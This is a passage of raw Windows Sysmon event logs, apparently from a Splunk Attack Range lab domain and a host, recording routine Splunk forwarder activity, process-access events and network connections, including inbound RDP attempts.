08:03:47.213{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84D51649DA299F1E7A362EF8BF411E6,SHA256=BC0BD47947AD2C68926172805436D611EB0F9693E77C198F595DD63D642C2466,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:45.314{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57411-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x80000000000000001053114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:48.678{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89D6AC89019E739FBE46E9C816F6ABB7,SHA256=A8BCD926EAB0695B954BC24F1502BABBF920C5D93AFF5FEF7A54D7D3757F78CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.692{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61905-false10.0.1.12-8000- 23542300x8000000000000000809668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:48.244{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EAC769DA5A0BC7AC26C4863B7945ECD,SHA256=9666A96FD1DE42B496EA80D503F434B1B1230AE6C8CC95BA68A04FD0A1C12F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:49.680{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C189097A88C8B5C094C5A2567001437,SHA256=222E413904F51C760372E1CFCC7364EFF919A574B268528E6DF2BF386A95EB4A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:49.244{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67DE3C13A090AD66554DED70DFAA7EDE,SHA256=3A39BD8A534A1421017FCC793703C13A93CEF3692810E0D18DAA30DD1BDE0BB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F766-60EB-C47D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:50.744{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F766-60EB-C47D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F766-60EB-C47D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.730{466BC892-F766-60EB-C47D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001053126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:42.547{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57412-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001053125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.697{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C0905CFA060E52AA1C2B3730C84BA39,SHA256=30AF3EB42690827C2A734B6AE04946CA532B9869A537FE22B0298762B57A6BAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:50.275{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A9C431958C6A4AF1566D5E185A40A31,SHA256=449192DB822813F13DE84025DAACC0894D807E809D4334E69E105F12657DFC42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.413{466BC892-F766-60EB-C37D-00000000CF01}97884460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F766-60EB-C37D-00000000CF01}9788C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:50.160{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:50.160{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F766-60EB-C37D-00000000CF01}9788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F766-60EB-C37D-00000000CF01}9788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.130{466BC892-F766-60EB-C37D-00000000CF01}9788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:48.575{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-16602-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000809672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:48.372{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.226.223.195-49581-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 
23542300x8000000000000000809671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:50.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02F6E6A8F42BB24DFBD5D85E6945EAC7,SHA256=C38425F6DC59071C6EEFB71FFF9CAC3378B3D24F58A30E52B6EA709CAB2226BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:50.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B04D46919152AD43BE24CDB443DA8E9,SHA256=96F6F80C3060892AF320D0687DD3F60C5ECACA1B3DF333D5472720805A818BE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F767-60EB-C67D-00000000CF01}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:51.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:51.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 